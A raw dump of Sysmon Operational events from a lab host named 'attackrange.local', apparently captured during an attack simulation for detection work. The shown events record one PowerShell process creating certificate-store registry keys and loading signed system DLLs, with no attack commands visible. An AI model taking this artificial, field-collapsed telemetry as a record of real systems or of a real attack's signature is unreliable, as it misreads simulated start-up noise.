17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530716Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530715Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530714Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 
12241200x80000000000000001530713Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530712Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530711Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530710Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530709Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530708Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530707Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530706Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530705Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 23542300x80000000000000001530704Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_qfae2o4a.uku.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsefalse - insufficient disk space 23542300x80000000000000001530703Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_yxpeu4r5.qkk.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7falsefalse - insufficient disk space 12241200x80000000000000001530702Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x80000000000000001530701Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll10.0.14393.0 (rs1_release.160715-1616)Crypto SIP provider for signing and verifying PowerShell script files (.ps1/.ps1xml)Microsoft® Windows® Operating SystemMicrosoft Corporationpwrshsip.dllMD5=5366DEE11C59571EC48B56020E8949DE,SHA256=EE5CDBEDA2067413ACB7B5E7B4AF53B40336148CA104D1671212B43737EB348CtrueMicrosoft WindowsValid 734700x80000000000000001530700Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001530699Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=FD7801997C3D60A432EAC5A08DF42C37,SHA256=E27CFC72999B8AB72BB0EAF1B75F13826C644CAF2F97980CC4A3AD3FE2D98BBEtrueMicrosoft CorporationValid 734700x80000000000000001530698Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\27b60a7418e19c1fccb099900e2e182a\System.Data.ni.dll4.8.4290.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft Corporationsystem.data.dllMD5=5B8A1387F38B3747F281326AE0AE6046,SHA256=72AFDE4C5841503A8DA13C06C8132644F73CE9B49086AF3B3DDBA5F85FA3D3D4false-Unavailable 734700x80000000000000001530697Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\iertutil.dll11.00.14393.4283 (rs1_release.210303-1802)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=5541A4A7FB64063F8AFB192ABD4DAE70,SHA256=AABF2E6C392F29B77F076BF705976B68B3100138BC63060335BD154B8417754DtrueMicrosoft WindowsValid 734700x80000000000000001530696Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft 
CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8trueMicrosoft WindowsValid 11241100x80000000000000001530695Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 734700x80000000000000001530694Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\urlmon.dll11.00.14393.4225 (rs1_release.210127-1811)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=37266F6D0E2F86FD3FC6E4724ED49823,SHA256=8AD484F4A7964D2D87047771BB21D3211F204F87D4EB029C1EFAA4FD935333B1trueMicrosoft WindowsValid 23542300x80000000000000001530693Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22364F316763F47D69DEBE53A28653F4,SHA256=0AAD522309C2A31D8D76669BD16FA4128A13A08EDF3995A309EC37950DD21FC7falsefalse - insufficient disk space 13241300x80000000000000001530692Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 734700x80000000000000001530691Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\OpcServices.dll10.0.14393.2848 (rs1_release.190305-1856)Native Code OPC Services LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationOpcServices.dllMD5=991F8CCB43104DE3BD6E24A4D2BF870D,SHA256=8187C096A269D20742DEC9B651536F1C7A354D114B176179B1F4E090BB28E1F2trueMicrosoft WindowsValid 13241300x80000000000000001530690Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530689Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530688Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 13241300x80000000000000001530687Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 734700x80000000000000001530686Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\AppxSip.dll10.0.14393.4169 (rs1_release.210107-1130)Appx Subject Interface PackageMicrosoft® Windows® Operating SystemMicrosoft CorporationAppxSip.dllMD5=33AEB645167296EFE22E1BB64B63CBFC,SHA256=6E2B948F3CD7EEC6D9A9A864476F074FB5876E397916FF81A39B23976489AB52trueMicrosoft WindowsValid 13241300x80000000000000001530685Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageListBinary Data 734700x80000000000000001530684Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wshext.dll5.812.10240.16384Microsoft ® Shell Extension for Windows Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwshext.dllMD5=BA425FEBA35E20778ADB8FAF7268D8A0,SHA256=3A2F8057B4312BE9389CB86C8C3FA8BA3A590E3CE811AB163D77159DB095AA41trueMicrosoft WindowsValid 734700x80000000000000001530683Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.717{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValid 734700x80000000000000001530682Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gpapi.dll10.0.14393.3986 (rs1_release.201002-1707)Group Policy Client APIMicrosoft® Windows® Operating SystemMicrosoft Corporationgpapi.dllMD5=601EDCF334B3DA561BE85560BFAB4831,SHA256=69422D4F7B2E9673178761052D25718F2F1F1D7D5B0962798ECAC66C123FB207trueMicrosoft WindowsValid 734700x80000000000000001530681Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msisip.dll5.0.14393.4350 (rs1_release.210407-2154)MSI Signature SIP ProviderWindows Installer - UnicodeMicrosoft CorporationMSISIP.DLLMD5=D847084F61752DB23D027FFC3CBEF8F7,SHA256=2061D01C7612A6010BDD83E0BB339A1040C8077595AD7A51C9E3ADC4B501B4BFtrueMicrosoft WindowsValid 734700x80000000000000001530680Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\a9817b0436b3d1ea69912071b1772668\System.Numerics.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Numerics.dllMD5=277A874D3C7FAF514D476913C562779E,SHA256=B0EBBA50E089358BBE363BB14DE6D80AB1F92F52C30C8FE13BC4358C8BB252B1false-Unavailable 12241200x80000000000000001530679Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x80000000000000001530678Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\497f2b8232570a09da6c199ca8afab42\System.DirectoryServices.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.DirectoryServices.dllMD5=1C9EB8C8F79E7AE6D1837A92AEA937C9,SHA256=3FDBD432E9BD0A40D636E64FED0E27AFA7AFE8EC8DFBAF1CEB0E02CF9D45E191false-Unavailable 12241200x80000000000000001530677Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs 12241200x80000000000000001530676Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs 12241200x80000000000000001530675Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates 12241200x80000000000000001530674Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x80000000000000001530673Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 
12241200x80000000000000001530672Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530671Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530670Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530669Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x80000000000000001530668Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530667Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530666Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530665Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x80000000000000001530664Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x80000000000000001530663Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530662Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530661Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530660Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x80000000000000001530659Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530658Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530657Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530656Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x80000000000000001530655Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x80000000000000001530654Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
734700x80000000000000001530536Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001530535Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x80000000000000001530534Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\9626a857db364c5cc8c0397184ff6f19\Microsoft.PowerShell.ConsoleHost.ni.dll10.0.14393.3866Microsoft.PowerShell.ConsoleHostMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.ConsoleHost.dllMD5=8C665AE171663A12BE10948B2BA07B86,SHA256=D552DDF56F054CE073331B359029BFEE76691EDE50C44990CCEEB44490C9F47Bfalse-Unavailable 734700x80000000000000001530533Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\da20d69661026f202acad55611f1f372\System.Core.ni.dll4.8.4330.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=0AA216B359BB985E91C06D6CEC347EF2,SHA256=5EDE9B67C3A3A41FCC240B0D7F27764343BD8C1BB1EAC39F441E00C6E5066C92false-Unavailable 734700x80000000000000001530532Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll4.8.4311.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=D71B052A790A577400CB572A7D4CB69B,SHA256=DE2BE5C6691862A5223BDFEFEE00F33FB6C7A5B2F6DC68124E44EB42D8D3B709false-Unavailable 734700x80000000000000001530531Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 